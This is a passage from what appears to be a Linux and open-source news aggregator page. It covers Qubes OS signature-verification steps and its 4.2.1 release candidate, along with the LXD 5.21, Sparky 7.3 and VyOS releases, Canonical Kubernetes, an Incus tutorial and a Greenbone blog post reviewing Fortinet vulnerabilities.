$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from... followed by an appropriate key. The [full] indicates full trust, which this key inherits by virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify command should always start with gpg: Good signature from... followed by an appropriate key.
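If you script these checks, the “final line” rule above can be automated. A sketch (not from the Qubes guide): in a real run you would capture gpg’s messages, which it writes to stderr, with something like out=$(gpg --verify file.sig file 2>&1); here a sample transcript stands in for that output.

```shell
# Sample of the stderr output a successful verification produces.
out='gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg:                using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]'

# Check that the final line reports a good signature.
case "$(printf '%s\n' "$out" | tail -n 1)" in
  'gpg: Good signature from'*) echo "signature OK" ;;
  *) echo "signature NOT verified" >&2; exit 1 ;;
esac
```

Checking gpg’s exit status as well (it is non-zero on a bad signature) makes such a script more robust than text matching alone.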
For this announcement (QSB-101), the command is:
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
You can also verify the signature directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for the signature file. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
We’re pleased to announce that the first release candidate (RC) for Qubes OS 4.2.1 is now available for testing. This patch release aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated verification files are available on the downloads page. For more information about the changes included in this version, see the full list of issues completed since the release of 4.2.0.
That depends on the number of bugs discovered in this RC and their severity. As explained in our release schedule documentation, our usual process after issuing a new RC is to collect bug reports, triage the bugs, and fix them. If warranted, we then issue a new RC that includes the fixes and repeat the process. We continue this iterative procedure until we’re left with an RC that’s good enough to be declared the stable release. No one can predict, at the outset, how many iterations will be required (and hence how many RCs will be needed before a stable release), but we tend to get a clearer picture of this as testing progresses. Here is the latest update:
At this point, we expect the stable release sometime around 2024-03-25.
If you’re willing to test this new RC, you can help us improve the eventual stable release by reporting any bugs you encounter. We encourage experienced users to join the testing team. The best way to test Qubes 4.2.1-rc1 is by performing a clean installation with the new ISO. We strongly recommend making a full backup beforehand.
As an alternative to a clean installation, there is also the option of performing an in-place upgrade without reinstalling. However, since Qubes 4.2.1 is simply Qubes 4.2.0 inclusive of all updates to date, this amounts to using a fully-updated 4.2.0 installation. In a sense, then, all current 4.2.0 users who are keeping up with updates are already testing 4.2.1-rc1, but this testing is only partial, since it does not cover things like the installation procedure.
As a reminder, we published the following special announcement in Qubes Canary 032 on 2022-09-14:
We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.
As always, we encourage you to authenticate this canary by verifying its PGP signatures. Specific instructions are also included in the canary announcement.
As with all Qubes signing keys, we also encourage you to authenticate the new Qubes OS Release 4.2 Signing Key, which is available in the Qubes Security Pack (qubes-secpack) as well as on the downloads page.
A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. RCs are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about Qubes OS supported releases and the version scheme in our documentation.
The Qubes OS Project uses the semantic versioning standard. Version numbers are written as <major>.<minor>.<patch>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See supported releases for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully updating it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the version scheme documentation.
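The scheme is mechanical enough to script. As a sketch (not from the Qubes docs), a version string can be split into its three components using only POSIX parameter expansion:

```shell
v="4.2.1"
major=${v%%.*}          # strip everything from the first dot -> "4"
rest=${v#*.}            # drop "major." -> "2.1"
minor=${rest%%.*}       # -> "2"
patch=${rest#*.}        # -> "1"
echo "major=$major minor=$minor patch=$patch"
```

Under this scheme, only the patch component differs between 4.2.0 and 4.2.1, which is exactly what “patch release” conveys.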
Video Read-through of 2023 Year End Financial Update: Slides and Transcript Welcome to Purism’s Investor Report Fiscal Year End 2023. In this report we’re going to go through an executive summary, profit and loss statement, balance sheet, and then conclusion. Executive Summary: All crowdfunded products have been delivered. This is important because the Librem 5 […]
The post 2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Margin appeared first on Purism.
15 March, 2024 05:50PM by Todd Weaver
Dear Armbian Community,
Here are the latest news!
With each new Armbian release, we bring you plenty of improvements. However, we also encounter some new bugs along the way. While some are our own doing, most come from various sources. Much of the software we distribute is common and maintained by third parties upstream, with our main focus on single board computers.
Challenges and Improvements
During the first week after the release, we faced some problems with the package repository. Our system is highly automated, but sometimes things don’t go smoothly. While trying to improve things, we accidentally caused a delay in updates for two weeks. We’re working hard to fix these issues and make our processes smoother for the future.
Rockchip Kernel Developments
We’ve been busy improving Rockchip vendor kernels, and we’re currently working on porting and testing their new 6.1.y release.
KDE Plasma Desktop Integration
Even though we were in the final stages of our release cycle, we managed to include the brand new release of the KDE Plasma desktop. Now, all supported boards come with KDE Plasma Neon v6.1 desktop images, based on the Ubuntu package base. These images offer the latest stable Armbian kernels and LTS package base, without the bloatware or Snap, giving you the best desktop experience.
Documentation Enhancement Initiative
We’re committed to improving our documentation. We’ve updated our Pull Request templates to make it easier for people to contribute. If you’re interested in helping us improve our documentation, join our upcoming Documentation Follow-up Meeting for more collaboration.
Stay tuned for more updates and improvements!
The Armbian team.
15 March, 2024 09:48AM by Igor Pečovnik
The stable release of LXD, the system container and VM manager, is now available. LXD 5.21 is the fifth LTS release for LXD, and will be supported for 5 years, until June 2029. This release significantly steps up LXD’s abilities in comparison to LXD 5.0 LTS, especially when operating in clustered environments. LXD 5.21.0 will be licensed under AGPL-3.0-only, in line with the change we announced last year. The conditions of the license are designed to encourage those looking to modify the software to contribute back to the project and the broader community. We hope you’ll enjoy what’s in store in this release. Before we jump into features, let’s start with some general changes that come with the new LTS.
Starting with this release we are changing the numbering scheme. This is the first LTS release that won’t use the n.0.n format, e.g. 6.0.x, and instead it will be 5.21.x.
What we have followed so far is that each LTS would start a new major version (e.g. 5.0) and each monthly feature release would build on that major version (e.g. 5.1 … 5.20). However, that seemed strange from the perspective of the LTS being an accumulation of all the work that has gone into the monthly releases over the past two years. This is why we decided to change the naming scheme to better reflect that the LTS represents the end of the cycle, rather than the beginning.
Going forward, the last of the monthly releases in the two-year LTS cycle will become the next LTS, in this case, 5.21.0. Then, we will restart the cycle with the first monthly release following the new major version number (e.g. 6.x). To avoid unexpected results for people who assumed the next LTS series would be 6.0.x we will not be releasing LXD 6.0, and the next feature release after this one will be LXD 6.1.
As we announced, we now have a dedicated team working on the LXD graphical user interface. We are happy to share that the LXD UI is deemed production grade and is now enabled by default in the LXD snap. We will continue to work on ensuring feature parity of the UI with the CLI.
Keep in mind that the external listener must still be enabled explicitly by setting core.https_address as outlined in the documentation.
Over the past two years, we have steadily been enhancing LXD capabilities to become an even more robust and featureful infrastructure tool. In addition to general features, some of the areas we are addressing are aimed at clustered environments, such as when deploying our newly launched MicroCloud solution, which builds on LXD.
As part of a push to provide a more industry-standard solution to authentication and authorization in LXD, we’ve added support for OpenID Connect for authentication and additional mechanisms for fine-grained authorization. The combination of these features will allow users to perform secure authentication and fine-grained access control. With the features completed in LXD, this will also be added to the UI in the coming months.
Please note that due to the change in the database, all users who currently authenticate to LXD with OIDC will temporarily lose access to their cluster, and will have to follow these steps to authenticate.
More information is available in the documentation about OIDC and fine-grained authorization.
As part of this work, the support for Canonical’s Candid RBAC service has been removed as it is in the process of being deprecated. LXD still supports external OIDC and TLS certificates for authentication.
To cover a wider variety of use cases, we are continuously evaluating adding new storage options and enhancing existing ones. In this LTS, we added support for object storage as well as support for Dell PowerFlex as another option for remote storage.
LXD now has support for object storage.
We’ve achieved this by adding a whole new concept of storage buckets along with a dedicated command (lxc storage bucket) and APIs. This allows LXD users to create new storage buckets, assign them a size limit and then manage access keys to that bucket. The bucket has its own URL with an S3 API.
For Ceph, we are using its rados gateway providing the S3 API.
For other storage drivers, we are using the MinIO project, which lets us offer an S3-compatible API directly from a local storage driver. Please note that this requires an externally provided MinIO server binary, configured via the minio.path setting.
Documentation: How to manage storage buckets and keys and Ceph Object storage driver
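In practice, creating and exposing a bucket takes only a couple of commands. A sketch (the pool and bucket names are made up; see the linked documentation for the exact workflow and options):

```shell
# Create a bucket on an existing storage pool, then issue an access
# key that S3 clients can use against the bucket's URL.
lxc storage bucket create default my-bucket
lxc storage bucket key create default my-bucket my-app-key
```

The key command prints the generated access and secret keys, which you then configure in your S3 client.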
There are various enablement activities between Dell and Canonical as a part of our ongoing partnership. The latest of them is adding support for LXD to interface directly with its PowerFlex service in order to allow LXD instances to be run on its platform. This offers an alternate remote storage option for enterprise use cases, where currently supported storage drivers may not be preferred.
Due to its design, PowerFlex is another LXD storage driver offering remote storage capabilities similar to the already existing implementation for Ceph RBD.
More information can be found in the documentation.
Since introducing support for virtual machines 4 years ago, we’ve been adding a variety of features to not only ensure feature parity with system containers but also cover a wide range of our users’ use cases. Some of the highlights for this LTS are support for live migration, non-UEFI VMs and ISO volumes, as well as enabling AMD SEV.
This release enables a much-improved VM live migration process, eliminating much of the perceivable downtime. Previously, LXD relied on the stateful stop function, which is the ability to write all the running memory and CPU state to disk, then stop the virtual machine, move it to a new system and start it back up again from where it was using the stored state. The improved functionality, on the other hand, allows the source and target servers to communicate right from the start of the migration. This allows for performing any state transfer in the background directly to the target host while the VM is still running, then transferring any remaining disk changes as well as the memory through multiple iterations of the migration logic and finally cutting over to the target system.
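From the CLI, a live migration within a cluster is triggered the same way as any instance move (the instance and member names here are hypothetical):

```shell
# Move a running VM to another cluster member; with live migration
# this happens with minimal perceivable downtime.
lxc move my-vm --target server02
```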
Documentation: Live migration for virtual machines
LXD now supports AMD SEV for memory encryption of virtual machines.
On compatible systems (AMD EPYC with firmware and kernel support enabled), setting security.sev to true will have the VM get its memory encrypted with a per-VM key handled by the firmware.
Systems supporting AMD SEV-ES can then turn on security.sev.policy.es to also have the CPU state encrypted for extra security.
Lastly, LXD also supports feeding custom session keys. Combined with LXD’s existing vTPM support, this feature can be used to ensure that the firmware is set up with those user provided keys and that the host operator doesn’t have any ability to tamper with the VM.
Documentation: Instance security options
LXD virtual machines have been designed to use a very modern machine definition from the start. This means LXD VMs offer a QEMU Q35 machine type combined with a UEFI firmware (EDK2) and even Secure Boot enabled by default.
While this works great for modern operating systems, it can be a problem when migrating existing physical or virtual machines into LXD as those machines may be using a legacy firmware (BIOS) and not be bootable under UEFI.
This can now be addressed by setting security.csm to true combined with disabling UEFI Secure Boot by setting security.secureboot to false. This switches QEMU to boot via Seabios directly rather than through EDK2.
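As a sketch, for a hypothetical VM named legacy-vm the two settings can be applied together before first boot:

```shell
# Boot via SeaBIOS (legacy BIOS) instead of UEFI/EDK2.
lxc config set legacy-vm security.csm=true
lxc config set legacy-vm security.secureboot=false
```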
Documentation: Security CSM
It is now possible to upload ISO image files as custom storage volumes. These can then be attached to a virtual machine as a bootable CD disk allowing simplified installation of custom operating systems from a “library” of custom ISO volumes.
Documentation: Launch a VM that boots from an ISO
The instance placement scriptlet feature was added to enable a better alternative to LXD’s default instance placement algorithms. Instead of the default behavior of placing a new instance on whichever cluster member was hosting the fewest instances, this new feature allows users to make a more deliberate choice. Now, users can provide a Starlark scriptlet that decides which cluster member to deploy the new instance on based on information about the new requested instance as well as a list of candidate cluster members. Importantly, while scriptlets are able to access certain information about the instance and the cluster, they cannot access any local data, hit the network or even perform complex time-consuming actions.
Documentation: Instance placement scriptlet
A feature commonly requested by those using LXD with Ceph and OVN: it’s now possible to have LXD automatically recover from a cluster member failure by effectively evacuating all instances to other systems.
This can only work with Ceph backed instances which don’t rely on any server-specific device or configuration.
This is controlled by a new cluster.healing_threshold configuration key, which defines the number of seconds after which a cluster member is considered to be offline and its instances are relocated.
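For example (the 30-second value is illustrative, not a recommendation):

```shell
# Consider a cluster member dead after 30 seconds and re-create its
# Ceph-backed instances on the remaining members.
lxc config set cluster.healing_threshold 30
```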
Documentation: Automatic cluster evacuation
Following the removal of shiftfs from the Ubuntu kernel (from Mantic onwards), LXD has now also dropped support for shiftfs. The preferred way for container filesystems to have their UID/GID mappings dynamically shifted is with idmapped mounts. In recent kernels, this is now supported for the ZFS and CephFS filesystems (in addition to the long-standing support for the ext4, xfs and btrfs filesystems).
The features outlined above are only the major highlights of this release. You can read the detailed announcement with a complete changelog on our discourse.
To get started with LXD, follow the get started guide.
Learn more about LXD on the LXD webpage.
For several years in a row, the Californian manufacturer Fortinet has been in the public eye due to serious security problems. Known for its secure firewall, VPN and intrusion detection devices, the cyber security expert was again forced to announce several highly critical security vulnerabilities in February 2024.
Staying informed and applying patches promptly is what companies need to proactively protect themselves against such attacks. Products such as Greenbone’s Enterprise Appliances play a central role in this and are meant to help admins. All the vulnerabilities mentioned in this blog post are covered by tests from the Greenbone Enterprise Feed: active procedures check whether the exploit is possible, and versioning tests will deliver results about the success of patch management.
87,000 passwords: Fortinet wins “Vulnerability of the Year 2022”
In 2019, CVE-2018-13379 (CVSS 9.8) allowed over 87,000 passwords for the Fortinet VPN to be read from the devices. In the following years, this vulnerability was exploited so successfully that in 2022 it was awarded the dubious title of “most exploited vulnerability of 2022”. The US authorities reacted and urged all of their clients to be more aware of the problem: the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) all warned that many customers did not apply patches promptly. Again, lack of foresight turned out to be one of the main reasons: prompt patching, the agencies said, would have prevented many of the successful attacks.
2023: Unwanted guests in critical networks
What makes it worse is the fact that Fortinet devices are mostly used in security-critical areas. Unpatched and equipped with serious vulnerabilities, such devices have become a focus for attackers in recent years, especially state actors. In 2023, for example, Chinese hacker groups successfully infiltrated Dutch military networks via a vulnerability in the FortiOS SSL VPN from December 2022 that had actually already been patched for a while (CVE-2022-42475, CVSS 9.3).
Even though the network was only used for research and development, according to the Military Intelligence and Security Service (MIVD), the attacks published at the beginning of February made it clear how easy it is for attackers to penetrate even highly protected networks. Worse still, the corresponding backdoor “Coathanger” allows attackers to gain permanent access to devices once they have been hacked, all thanks to CVE-2022-42475, which allows the execution of arbitrary code.
February 2024: Warnings of further vulnerabilities, maximum severity
Unfortunately, the story does not end here: at the beginning of February 2024, Fortinet had to admit to another serious vulnerability. CVE-2024-21762 (CVSS score: 9.6) allows unauthenticated attackers to execute arbitrary code via specially crafted requests. A long list of versions of the Fortinet operating system FortiOS and of FortiProxy are affected. The manufacturer advises upgrading or deactivating the SSL VPN and warns of both the severity of the vulnerability and the fact that it is already being massively exploited by attackers.
Fortinet seemed to have some organizational issues, too. CVE-2024-23108 and CVE-2024-23109, published just a few days later, sounded just as bad as the above: they also allow unauthenticated attackers to execute arbitrary code. However, these CVEs have to be taken with a grain of salt: the fact that two CVEs from the same manufacturer received a 10.0 on the threat severity scale on the same day is probably unique and raised some experts’ eyebrows. Apart from that, the confusing communication from the vendor was not exactly likely to build or further trust, similarly to the strange story of toothbrush-based attacks told by a Fortinet employee, which reached the mass media at the same time.
Fatal combination – vulnerability management can help
As always, Fortinet published patches promptly, but customers also have to install them. Again, the combination of serious security vulnerabilities, lack of awareness and missing patches showed its full impact: only a few days later, the US government pushed out another advisory from CISA, the NSA and the FBI about Volt Typhoon, a Chinese state hacker group. The US government had evidence that these attackers had been permanently entrenched in the critical infrastructure of US authorities for many years via such vulnerabilities; the associated risks should not be underestimated, according to the warning.
The security by design required there also includes the constant monitoring of one’s own servers, computers and installations with vulnerability tests such as those of Greenbone Enterprise Appliances. Those who constantly monitor their networks (not just Fortinet devices) with the vulnerability tests of a modern vulnerability scanner can inform their administrators as quickly as possible if known CVEs in an infrastructure are waiting for patches, reducing the attack surface.
15 March, 2024 06:57AM by Markus Feilner
Hello, Community!
The VyOS 1.4.0-epa2 image is now available to customers and contributors (and everyone can build it from the sagitta branch of vyos-build, of course)! If you are new to VyOS, the "EPA" part means "early production access" — the final stage when the release is already used in production by a subset of users and on our own infrastructure. This is the second release on the path to the final stabilization of the 1.4.0/Sagitta branch. It mainly features bug fixes but also contains minor features.
15 March, 2024 12:36AM by Daniil Baturin (daniil@sentrium.io)
The 3rd update of Sparky 7 – 7.3 is out.
It is a quarterly updated point release of Sparky 7 “Orion Belt” of the stable line. Sparky 7 is based on and fully compatible with Debian 12 “Bookworm”.
Changes:
– all packages updated from Debian and Sparky stable repos as of March 13, 2024
– Linux kernel PC: 6.1.67 LTS (6.8.0, 6.6.21-LTS & 5.15.151-LTS in sparky repos)
– Linux kernel ARM: 6.6.20 LTS
– LibreOffice 7.4.7
– KDE Plasma 5.27.5
– LXQt 1.2.0
– MATE 1.26
– Xfce 4.18
– Openbox 3.6.1
– Firefox 115.8.0esr (123.0.1-sparky in sparky repos)
– Thunderbird 115.8.0
– VLC 3.0.20
– Exaile 4.1.3
– added new application (amd64 only): Noi – a chatbot GUI application with support for ChatGPT, Claude, Bard, Poe, Perplexity, Copilot, HuggingChat, Pi, Coze and YOU.
Sparky 7.3 “Orion Belt” is available in the following versions:
– amd64 BIOS/UEFI+Secure Boot: Xfce, LXQt, MATE, KDE Plasma, MinimalGUI (Openbox) & MinimalCLI (text mode)
– i686 non-pae BIOS/UEFI (Legacy): MinimalGUI (Openbox) & MinimalCLI (text mode)
– ARMHF & ARM64 Openbox & CLI
By default, ‘os-prober’ is not executed to detect other bootable partitions, but Sparky provides a GRUB option to detect other OSes anyway. However, a subsequent update of the GRUB packages overrides that option. To restore it manually, add the line (as root):
GRUB_DISABLE_OS_PROBER=false
to the end of the file /etc/default/grub, then update GRUB:
sudo update-grub
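As a sketch, the edit can be scripted so it is safe to re-run after GRUB package updates. The example below works on a temporary copy of the file, so you can test it anywhere; point grub_file at the real /etc/default/grub (as root) to apply it for real.

```shell
# Idempotent sketch: append GRUB_DISABLE_OS_PROBER=false only if the
# variable is not already set. Works on a temporary copy for safety;
# set grub_file=/etc/default/grub (as root) for the real edit.
grub_file=$(mktemp)
printf 'GRUB_DEFAULT=0\nGRUB_TIMEOUT=5\n' > "$grub_file"

if ! grep -q '^GRUB_DISABLE_OS_PROBER=' "$grub_file"; then
  echo 'GRUB_DISABLE_OS_PROBER=false' >> "$grub_file"
fi

tail -n 1 "$grub_file"   # -> GRUB_DISABLE_OS_PROBER=false
```

Because the append is guarded by the grep, running the snippet again after a GRUB update does not add a duplicate line; follow it with sudo update-grub as shown above.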
PC live user:password = live:live
ARM user:password = pi:sparky
If you have Sparky 7 installed – simply keep it up to date. No need to reinstall your OS.
New iso images of Sparky 7 “Orion Belt” can be downloaded from the download/stable page
Informacja o wydaniu w języku polskim: https://linuxiarze.pl/sparky-7-3/
14 March, 2024 09:17PM by pavroo
Kubernetes revolutionised container orchestration, allowing faster and more reliable application deployment and management. But even though it transformed the world of DevOps, it introduced new challenges around security maintenance, networking and application lifecycle management.
Canonical has a long history of providing production-grade Kubernetes distributions, which gave us great insights into Kubernetes’ challenges and the unique experience of delivering K8s that match the expectations of both developers and operations teams. Unsurprisingly, there is a world of difference between them. Developers need a quick and reproducible way to set up an application environment on their workstations. Operations teams with clusters powering the edge need lightweight high-availability setups with reliable upgrades. Cloud installations need intelligent cluster lifecycle automation to ensure applications can be integrated with each other and the underlying infrastructure.
We provide two distributions, Charmed Kubernetes and MicroK8s, to meet those different expectations. Charmed Kubernetes wraps upstream K8s with software operators to provide lifecycle management and automation for large and complex environments. It is also the best choice if the Kubernetes cluster has to integrate with custom storage, networking or GPU components. MicroK8s has a thriving community of users; it is a production-grade, ZeroOps solution that powers laptops and edge environments. It is the simplest way to get Kubernetes anywhere and focus on software product development instead of working with infrastructure routines and operations.
After providing Kubernetes distributions for over seven years, we decided to consolidate our experience into a new distribution that combines the best of both worlds: ZeroOps for small clusters and intelligent automation for larger production environments that also want to benefit from the latest community innovations.
Canonical Kubernetes will be our third distribution and an excellent foundation for future MicroK8s and Charmed Kubernetes releases. You can find its beta in our Snap Store under the simple name k8s. We based it on the latest upstream Kubernetes 1.30 beta, which officially came out on 12 March. It will be a CNCF conformant distribution with an enhanced security posture and best-in-class open source components for the most demanding user needs: network, DNS, metrics server, local storage, ingress, gateway, and load balancer.
Canonical Kubernetes is easy to install and easy to maintain. Like MicroK8s, Canonical Kubernetes is installed as a snap, giving developers a great installation experience and advanced security features such as automated patch upgrades. Adding new nodes to your cluster comes with minimum hassle. It also provides a quick way to set up high availability.
You need two commands to get a single node cluster, one for installation and another for cluster bootstrap. You can try it out now on your console by installing the k8s snap from the beta channel:
sudo snap install k8s --channel=1.30-classic/beta --classic
sudo k8s bootstrap
If you look at the status of your cluster just after bootstrap – with the help of the k8s status command – you might immediately spot that the network, dns, and metrics-server are already running. In addition to those three, Canonical Kubernetes also provides local-storage, ingress, gateway, and load-balancer, which you can easily enable. Under the hood, these are powered by Cilium, CoreDNS, OpenEBS, and Metrics Server. We bundle these as built-in features to ensure tight integration and a seamless experience. We want to emphasise standard Kubernetes APIs and abstractions to minimise disruption during upgrades while enabling the platform to evolve.
All our built-in features come with default configurations that make sense for the most popular use cases, but you can easily change them to suit your needs.
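As a sketch of what enabling the optional features could look like (assuming `k8s enable <feature>` is the toggle exposed by the snap; verify with `sudo k8s help` on your install), the loop below only prints the commands for the four optional features named above:

```shell
# Print the enable commands for the optional built-in features listed
# above. `k8s enable <feature>` is an assumption based on the snap's
# CLI; verify with `sudo k8s help` before running the printed commands.
for feature in local-storage ingress gateway load-balancer; do
  printf 'sudo k8s enable %s\n' "$feature"
done
```

Printing rather than executing lets you review the commands first; network, dns, and metrics-server need no such step since they are running right after bootstrap.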
Typical application development flows start with the developer workstation and go through CI/CD pipelines to end up in the production environment. These software delivery stages, spanning various environments, should be closely aligned to enhance developer experience and avoid infrastructure configuration surprises as your software progresses through the pipeline. When done right, you can deploy applications faster. You also get better security assurance as everyone can use the same K8s binary offered by the same vendor across the entire infrastructure software stack.
When you scale up from the workstation to a production environment, you will inevitably be exposed to a different class of problems inherent to large-scale infrastructure. For instance, managing and upgrading cluster nodes becomes complicated and time-consuming as the number of nodes and applications grows. To provide the smooth automation administrators need, we offer Kubernetes lifecycle management through Juju, Canonical’s open source orchestration engine for software operators.
If you have Juju installed on your machine already, a Canonical Kubernetes cluster is only a single command away:
juju deploy k8s --channel edge
By letting the Juju charm automate your lifecycle management, you can benefit from Juju’s rich integration ecosystem, including the Canonical Observability Stack.
Security is critical to any Kubernetes cluster, and we have addressed it from the beginning. Canonical Kubernetes 1.30 installs as a snap with a classic confinement level, enabling automatic patch upgrades to protect your infrastructure against known vulnerabilities. Canonical Kubernetes will be shipped as a strict snap in the future, which means it will run in complete isolation with minimal access to the underlying system’s resources. Additionally, Canonical Kubernetes will comply with security standards like FIPS, CIS and DISA-STIG.
Critical functionalities we have built into Canonical Kubernetes, such as networking or dns, are shipped as secure container images maintained by our team. Those images are built with Ubuntu as their base OS and benefit from the same security commitments we make on the distribution.
While it is necessary to contain core Kubernetes processes, we must also ensure that the user or operator-provided workloads running on top get a secure, adequately controlled environment. Future versions of Canonical Kubernetes will provide AppArmor profiles for the containers that do not inherit the enhanced features of the underlying container runtime. We will also work on creating an allowlist for kernel modules that can be loaded using the Kubernetes Daemonsets. It will contain a default list of the most popular modules, such as GPU modules needed by AI workloads. Operators will be able to edit the allowlist to suit their needs.
We would love for you to try all the latest features in upstream Kubernetes through our beta. Get started by visiting http://documentation.ubuntu.com/canonical-kubernetes
Besides getting a taste of the features I outlined above, you’ll be able to try exciting changes that will soon be included in the upcoming upstream GA release on 17 April 2024. Among others, CEL for admission controls will become stable, and the drop-in directory for Kubelet configuration files will go to the beta stage. Additionally, Contextual logging and CRDValidationRatcheting will graduate to beta and be enabled by default. There are also new metrics, such as image_pull_duration_seconds, which can tell you how much time the node spent waiting for the image.
We want Canonical Kubernetes to be a great K8s for everyone, from developers to large-scale cluster administrators.
Try it out and let us know what you think. We would love your feedback! You can find contact information on our community page.
We’ll also be available at KubeCon in Paris, at booth E25 – if you are there, come and say hi.
Incus is a manager for virtual machines and system containers.
A system container is an instance of an operating system that runs on a computer alongside the main operating system. Instead of hardware virtualization, a system container uses security primitives of the Linux kernel for separation from the main operating system. You can think of system containers as software virtual machines.
In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use case is that you have several Incus containers, each hosting a website, and you want your Web developer to have access to their files from a central location over either FTP or SFTP. Ideally, that central location should be an Incus container as well.
Therefore, we are looking at how to share storage between containers. The other case, which we are not covering here, is how to share storage between the host and the containers.
We are creating several Incus containers, each one a separate web server. Each web server expects to find its Web content files in the /var/www/ directory. Then, we want to create a separate container for the Web developer, in order to give access to those /var/www/ directories from a central location. The Web developer will get access to that specific container and only that container. As Incus admins, we are supposed to provide the Web developer with access to that container through SSH or FTP.
In this setup, the Incus container for the web server is webserver1 and the Web developer’s container is called webdev.
